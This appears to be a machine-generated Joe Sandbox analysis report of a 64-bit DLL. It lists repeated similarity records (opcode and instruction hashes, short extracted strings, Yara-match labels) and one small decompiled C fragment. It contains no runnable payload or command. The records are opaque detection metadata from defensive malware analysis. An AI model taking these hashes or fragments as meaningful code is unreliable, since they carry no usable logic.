                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 5t%$y
                                                                                                        • API String ID: 0-493594994
                                                                                                        • Opcode ID: 6f0e00c9ead975cfaf4ea2e77c512cc28932c103f1f544ab72cc7830bdf191ce
                                                                                                        • Instruction ID: 6792571393c1fc0b2eb6fbc5ae81dec58a59b384453640eb5fb68cdcf9e85be0
                                                                                                        • Opcode Fuzzy Hash: 6f0e00c9ead975cfaf4ea2e77c512cc28932c103f1f544ab72cc7830bdf191ce
                                                                                                        • Instruction Fuzzy Hash: AA918BB190078ECFDB58CF68C84A5CE7BB0FB14358F404A19F866962A0D3B4DA65CF95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 1e$f<$F
                                                                                                        • API String ID: 0-2724976541
                                                                                                        • Opcode ID: 1d95138f6fdf08470e8f176c0dd76d9716459aa4dede15dc4b9a20d9c628de90
                                                                                                        • Instruction ID: bed1062ba2242fdda31b79b65a0af6ec507006944e588aaef166d9663dde45ee
                                                                                                        • Opcode Fuzzy Hash: 1d95138f6fdf08470e8f176c0dd76d9716459aa4dede15dc4b9a20d9c628de90
                                                                                                        • Instruction Fuzzy Hash: 1971197010468CABEBBACF68C8997D937A0FB48348F50861DE90D8E290DF749B49DB01
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: L$Y"
                                                                                                        • API String ID: 0-1467774553
                                                                                                        • Opcode ID: 2c48c4371220eb54a9ab09e752dd04f6ad79d49a1bf6e2c0c73efc3286d8c696
                                                                                                        • Instruction ID: b3e18f2d7fd9a4b9b80f79599815d3f82c5d11737bc9d592f484fdbe236454d7
                                                                                                        • Opcode Fuzzy Hash: 2c48c4371220eb54a9ab09e752dd04f6ad79d49a1bf6e2c0c73efc3286d8c696
                                                                                                        • Instruction Fuzzy Hash: CB61267151074D9FDB88CF28C8C9AC97BA1FB483A8F55A218FC0A97255C7B4D885CF85
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Sa$y&
                                                                                                        • API String ID: 0-700414750
                                                                                                        • Opcode ID: 20d9025a8a3505d7d31e7295bad198ad76a83a447a1e61e4b9726380a692546c
                                                                                                        • Instruction ID: dfee43bf4d265d3107084244710d0931b241e98621e1a28360d7d5c9830a69e6
                                                                                                        • Opcode Fuzzy Hash: 20d9025a8a3505d7d31e7295bad198ad76a83a447a1e61e4b9726380a692546c
                                                                                                        • Instruction Fuzzy Hash: 6551007061C7848FD7A8DF28C18675BBBF0FBDA704F004A1DE689C7261D77699458B42
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: , N$0gL
                                                                                                        • API String ID: 0-3996470819
                                                                                                        • Opcode ID: f2532db71947988c01e260eeb170c32121aeeb8cf32307669213a599370f11e8
                                                                                                        • Instruction ID: e6cd01448f2141974011cda714a22c6421916980406a2c47b20c1b92061da8ef
                                                                                                        • Opcode Fuzzy Hash: f2532db71947988c01e260eeb170c32121aeeb8cf32307669213a599370f11e8
                                                                                                        • Instruction Fuzzy Hash: 2551C470500BCCCBEBBACF54CC8D7DA3BA1BB98305F104619D94A9E790DB795648CB41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 1/$G`OV
                                                                                                        • API String ID: 0-3929948944
                                                                                                        • Opcode ID: d62949ad0294063053f77de7a54004d2a4a62d647e2eb2b3cc8fcc7dd014da9b
                                                                                                        • Instruction ID: 31e3bcd664d6a8acacbd44d2cd4791fc9ee9cbc125b163ac38e43a9671c391af
                                                                                                        • Opcode Fuzzy Hash: d62949ad0294063053f77de7a54004d2a4a62d647e2eb2b3cc8fcc7dd014da9b
                                                                                                        • Instruction Fuzzy Hash: E241177050CB848BDBB8DF28D48579AB7E1FB98304F908A1EE88DC7351DB749588CB46
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 2V$W5
                                                                                                        • API String ID: 0-1873325321
                                                                                                        • Opcode ID: 2cac5ebb664ebc0649a93560a62f559e178364f761da87e25be392b8304fa33a
                                                                                                        • Instruction ID: 63ef17b550405aac1bd81048b7740241b15b08bd30737758e2ae9d54adb6feaa
                                                                                                        • Opcode Fuzzy Hash: 2cac5ebb664ebc0649a93560a62f559e178364f761da87e25be392b8304fa33a
                                                                                                        • Instruction Fuzzy Hash: 1741C3B190074A8BDB48DF24C4965DE7FB1FB68398F10421DFC5A9A290D3B8D6A4CBD4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ANSk$oB#x
                                                                                                        • API String ID: 0-2811520726
                                                                                                        • Opcode ID: 113bf255f30907f85ca083131261c133160d8791ed09c7962e46f1e4aa7aeec8
                                                                                                        • Instruction ID: d26c3f383fa39858f36e8a1a25e13c9e437254a393a26a1cbff70abbe494b10c
                                                                                                        • Opcode Fuzzy Hash: 113bf255f30907f85ca083131261c133160d8791ed09c7962e46f1e4aa7aeec8
                                                                                                        • Instruction Fuzzy Hash: E141E2B090078E8FDF48CF68C8865DE7BB0FB48358F50461DFC56A6290D3B49664CB85
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (B$3
                                                                                                        • API String ID: 0-3108688774
                                                                                                        • Opcode ID: ae8899e9af14a8bd0728e043f2f3e6ee9a39677d1fd67c8acad13cfb8091b350
                                                                                                        • Instruction ID: 4d52e68c3b5894455c2b855b72f500be9282249362062767deb9202ab9d457a9
                                                                                                        • Opcode Fuzzy Hash: ae8899e9af14a8bd0728e043f2f3e6ee9a39677d1fd67c8acad13cfb8091b350
                                                                                                        • Instruction Fuzzy Hash: 2D41B2706087408BE758DF28C18955BBBF1BBC9744F104A1DFA968B3A0DB75D945CF82
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 6`$\I
                                                                                                        • API String ID: 0-4113516648
                                                                                                        • Opcode ID: c820624380164a86f4011e9cac2eee3e4169805a9087f8d545a9fc14e305f8a8
                                                                                                        • Instruction ID: 87e2cadb684af144f703d936105f11dfb57f24fa6abc88236f5ea505cb77e2af
                                                                                                        • Opcode Fuzzy Hash: c820624380164a86f4011e9cac2eee3e4169805a9087f8d545a9fc14e305f8a8
                                                                                                        • Instruction Fuzzy Hash: 4641F77190070D8BDF48DF68C58A5DD7FB0FB483A8F2A621DE80AB6260D7759585CB88
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: KrTD$_D
                                                                                                        • API String ID: 0-934927992
                                                                                                        • Opcode ID: e1601d4e70e378c5a6ecebcd8442673b18ca16eef11f20bd0ff53c9d04a0e76b
                                                                                                        • Instruction ID: 79f0e27b47198620a76255f61a383142c91a704a78014043126b857d0cce2a1e
                                                                                                        • Opcode Fuzzy Hash: e1601d4e70e378c5a6ecebcd8442673b18ca16eef11f20bd0ff53c9d04a0e76b
                                                                                                        • Instruction Fuzzy Hash: 54316D716187818BD748DF28C05A42ABBE1FB9D30CF444B1DF8CAA6291D7789615CB4A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: A%9{$V
                                                                                                        • API String ID: 0-1820082490
                                                                                                        • Opcode ID: 625af2db419091958e7d4df6c25d7188c91703984e83660915dca7ebc696b449
                                                                                                        • Instruction ID: 03f72db5704a5358c6f1172bde4b1415201ccefee93438e503f81867a50f7b44
                                                                                                        • Opcode Fuzzy Hash: 625af2db419091958e7d4df6c25d7188c91703984e83660915dca7ebc696b449
                                                                                                        • Instruction Fuzzy Hash: E941A2B180038E8FDF48DF64D8865CE7FF4FB48348F114619E859AA250D3B8D694CB85
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ($>>
                                                                                                        • API String ID: 0-1145299130
                                                                                                        • Opcode ID: bfec8586a8ac1bda717ee4d3e998b35be4f018f17ebb2d31d060e621415d9480
                                                                                                        • Instruction ID: 87f9655775df96d3def6b8efa86b2c726d5a06aaa2b0f8cf4872ed89fb5ea4fb
                                                                                                        • Opcode Fuzzy Hash: bfec8586a8ac1bda717ee4d3e998b35be4f018f17ebb2d31d060e621415d9480
                                                                                                        • Instruction Fuzzy Hash: FF31D3B190074E8BDF48CF64C88A1DE7FB0FB58358F24461DE946A6290D3B8D6A4CBC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: bv$f
                                                                                                        • API String ID: 0-3039744445
                                                                                                        • Opcode ID: 46d2aa2ebc9209d71c82958834864fb94c0878401221f978366f9a402f9450e9
                                                                                                        • Instruction ID: 5cd7742688e295825d2d7ad71e75fb66b1b5906d5501222e705b32419eb79afe
                                                                                                        • Opcode Fuzzy Hash: 46d2aa2ebc9209d71c82958834864fb94c0878401221f978366f9a402f9450e9
                                                                                                        • Instruction Fuzzy Hash: 0E41B17091438A8FDB49CF68D84A5DE7FF0FB58348F104A29F86AA6250D3B4D664CF85
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: *!#$mV5
                                                                                                        • API String ID: 0-2993575305
                                                                                                        • Opcode ID: 4245992fb973f88090a409a267d2f85edccab32cf52bd4f60c75fea94f1a4a84
                                                                                                        • Instruction ID: f4257f88e51e2467cedc4a109958e0d61b2de26f6874c0326167d1c9068f5517
                                                                                                        • Opcode Fuzzy Hash: 4245992fb973f88090a409a267d2f85edccab32cf52bd4f60c75fea94f1a4a84
                                                                                                        • Instruction Fuzzy Hash: 0931C4B150038E8BDB48CF28C94A5DE7BB0FB58358F014A19FC6696290D7B8D665CFC4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: `{$l^jf
                                                                                                        • API String ID: 0-1869605660
                                                                                                        • Opcode ID: 28521cbd4e872c1ef803d1df5e8c14565f9c4bc258fc16fe96f59b7c9f67bd2e
                                                                                                        • Instruction ID: eb540d20a08f5e40d8c0ff40e11836e8ded1822f40ca17c0ef14950dbd3fc5a0
                                                                                                        • Opcode Fuzzy Hash: 28521cbd4e872c1ef803d1df5e8c14565f9c4bc258fc16fe96f59b7c9f67bd2e
                                                                                                        • Instruction Fuzzy Hash: D1317FB162D784AFD388DF28D49591ABBE0FB88354F806A1DF8868B290D775D855CB02
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 2-$-
                                                                                                        • API String ID: 0-2034864362
                                                                                                        • Opcode ID: 20bbbdbc3827e50294dde3ee49f0cdd293043f0a077c143f70453fda15f8f7c4
                                                                                                        • Instruction ID: 4005107032f2b12f9f607655d62483a8781f58ab60f16824121cd48537e79645
                                                                                                        • Opcode Fuzzy Hash: 20bbbdbc3827e50294dde3ee49f0cdd293043f0a077c143f70453fda15f8f7c4
                                                                                                        • Instruction Fuzzy Hash: CC317FB190078E8FDF48DF68C84A59A7BB0FB18318F414A1AFC6996254D3B4CA64CBD4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: <&$q/
                                                                                                        • API String ID: 0-2233190826
                                                                                                        • Opcode ID: 15a5214ead44a1f0762e7863b7fdc3010a0d9091678656a87e304455b9a574ab
                                                                                                        • Instruction ID: 34f360e2f025a71cd2e5aa73a3d426e5d18a321659368207a0a8d8f01dd344ad
                                                                                                        • Opcode Fuzzy Hash: 15a5214ead44a1f0762e7863b7fdc3010a0d9091678656a87e304455b9a574ab
                                                                                                        • Instruction Fuzzy Hash: EE319CB0508B888BE759DF25C48A50BBBF2FBC5788F200A1DF292867A0D775D549CF42
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ?P>$g%
                                                                                                        • API String ID: 0-4203485977
                                                                                                        • Opcode ID: e7f509d9a25edf16b23a548fc7fe81b9e6bc0ab59227e88e5feb3085b6c3579d
                                                                                                        • Instruction ID: 717686fd7735f49e019bed61dd90445519292eacbbe0b0eb12e200a6e4bac1a5
                                                                                                        • Opcode Fuzzy Hash: e7f509d9a25edf16b23a548fc7fe81b9e6bc0ab59227e88e5feb3085b6c3579d
                                                                                                        • Instruction Fuzzy Hash: 2731B2B090438E8FDB44DF64D88A6DF7BB0FB58348F104A19EC6996250D3B8D664CBC5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: "X,h$Ts
                                                                                                        • API String ID: 0-4155455058
                                                                                                        • Opcode ID: 217a8b3ebbc510d3abab149b4def833290e522513fd0b99837b1368bb75def2b
                                                                                                        • Instruction ID: 78e44bf7acd730168ef7454480584198ea74db249acf4ebf7474d583245c3fc9
                                                                                                        • Opcode Fuzzy Hash: 217a8b3ebbc510d3abab149b4def833290e522513fd0b99837b1368bb75def2b
                                                                                                        • Instruction Fuzzy Hash: 7D215DB0529785ABD398DF28D08991EBBE0BBC4308F806A1DF8858A350D7B4D548CF43
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Mbqz
                                                                                                        • API String ID: 0-2241695783
                                                                                                        • Opcode ID: c7e5bd259350cc8d432e2e418653ef11db78de1d8ea4b143f2c3ed3acbc8f7f6
                                                                                                        • Instruction ID: 750b1e4ffae553eb56a080148391b3b5c453ff61d810ae7c75f6761a4f8562eb
                                                                                                        • Opcode Fuzzy Hash: c7e5bd259350cc8d432e2e418653ef11db78de1d8ea4b143f2c3ed3acbc8f7f6
                                                                                                        • Instruction Fuzzy Hash: 6BB23CB552568D8FDBBADF28C8A97D93BE5FB5C304F00422ADC0ACA260E7749755CB40
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00007FFC7FFC2890C334(long long __rbx, void* __rcx, void* __rdx, long long __rsi, signed int __r8, void* __r9) {
                                                                                                        				signed long long _t25;
                                                                                                        				void* _t27;
                                                                                                        				void* _t30;
                                                                                                        
                                                                                                        				 *((long long*)(_t30 + 8)) = __rbx;
                                                                                                        				 *(_t30 + 0x10) = _t25;
                                                                                                        				 *((long long*)(_t30 + 0x18)) = __rsi;
                                                                                                        				_t27 = (_t25 | 0xffffffff) + 1;
                                                                                                        				if ( *((intOrPtr*)(__rcx + _t27)) != sil) goto 0x2890c362;
                                                                                                        				if (_t27 + __rdx -  !__r8 <= 0) goto 0x2890c39e;
                                                                                                        				return __rdx + 0xb;
                                                                                                        			}






                                                                                                        0x7ffc2890c334
                                                                                                        0x7ffc2890c339
                                                                                                        0x7ffc2890c33e
                                                                                                        0x7ffc2890c362
                                                                                                        0x7ffc2890c369
                                                                                                        0x7ffc2890c37c
                                                                                                        0x7ffc2890c39d

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.268118158.00007FFC28901000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC28900000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.268112460.00007FFC28900000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268155215.00007FFC28938000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268319910.00007FFC2897E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268327950.00007FFC28982000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268343621.00007FFC28985000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.268348129.00007FFC28987000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc28900000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c3dbb0acb19b1786796477eb2973993dd2a31b244324abc6045056baec5c30e6
                                                                                                        • Instruction ID: 0be8957a75473de632eb7a24bd7a4da71275f2feba35a5f08ab9a9494ce7b685
                                                                                                        • Opcode Fuzzy Hash: c3dbb0acb19b1786796477eb2973993dd2a31b244324abc6045056baec5c30e6
                                                                                                        • Instruction Fuzzy Hash: F5512722B087A585FB20AB72AC405AE7BA0FB40B99F044136EE9C27BD5CF3DD001C704
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: m1
                                                                                                        • API String ID: 0-128121454
                                                                                                        • Opcode ID: 16691c6ba2deddaf6de1f0e0d1ff2ca3acd048d37c77c35f5dce586baf0938cf
                                                                                                        • Instruction ID: 5f51607b613c9aae9948664f2987d724fcb5cf1c05a1f438c657f6daf5c41e3f
                                                                                                        • Opcode Fuzzy Hash: 16691c6ba2deddaf6de1f0e0d1ff2ca3acd048d37c77c35f5dce586baf0938cf
                                                                                                        • Instruction Fuzzy Hash: 29F11770A04709EFDB58DF68C04A69EBBF2FB48344F40C16DE84AEB290D7759A59CB41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 7s
                                                                                                        • API String ID: 0-1359173241
                                                                                                        • Opcode ID: c3a57ae48d23b59515346257547aa727b2d15ec4c2b1e011d86899241bc59301
                                                                                                        • Instruction ID: c1bed52c3035b45a669a36fe4e02841f36ae4e7ddeb46aacfe2c23f9d3337973
                                                                                                        • Opcode Fuzzy Hash: c3a57ae48d23b59515346257547aa727b2d15ec4c2b1e011d86899241bc59301
                                                                                                        • Instruction Fuzzy Hash: 3B0267B5A0070DCFDB58CF28C59A59D3BA9FB49308F00412DFD0E9A2A4E7B4E915CB56
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0% E
                                                                                                        • API String ID: 0-2094739979
                                                                                                        • Opcode ID: fbf25035978568d4367fdb2795cf05a7893d79d110a623251b08c664a1ec8ff4
                                                                                                        • Instruction ID: 3cbd3403ae3a5eec6cd9fa22ed9c4212c86eadd61d9582ce71e19d9336bf90de
                                                                                                        • Opcode Fuzzy Hash: fbf25035978568d4367fdb2795cf05a7893d79d110a623251b08c664a1ec8ff4
                                                                                                        • Instruction Fuzzy Hash: C8F108B1A0570CCFDBA8DFA8D58A6CDBBF1FF44344F104119E84AA7290D7B8951ACB49
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: >
                                                                                                        • API String ID: 0-4048615937
                                                                                                        • Opcode ID: 35f082249332f6d240efb6a3c148916e58dc78f6fac7b8448015639dc79bfce0
                                                                                                        • Instruction ID: b0185e3000dff54f49d8606eba530083518bcd1c244eb05af1b54d96feabf3c3
                                                                                                        • Opcode Fuzzy Hash: 35f082249332f6d240efb6a3c148916e58dc78f6fac7b8448015639dc79bfce0
                                                                                                        • Instruction Fuzzy Hash: 33D14A715047888BDBF9CF24C88A7D97BE1FB89304F50861DE88ECA291DB749659CB42
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.267349016.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: w
                                                                                                        • API String ID: 0-4210951952
                                                                                                        • Opcode ID: 450a975b33d67058faa5ef23269fdb7d474cb1b00904f6db6eeb6156179070ce
                                                                                                        • Instruction ID: 98e286694507409f0343718d484b9c1230728cd38d8ca75ba1cdcc522b4ff82c
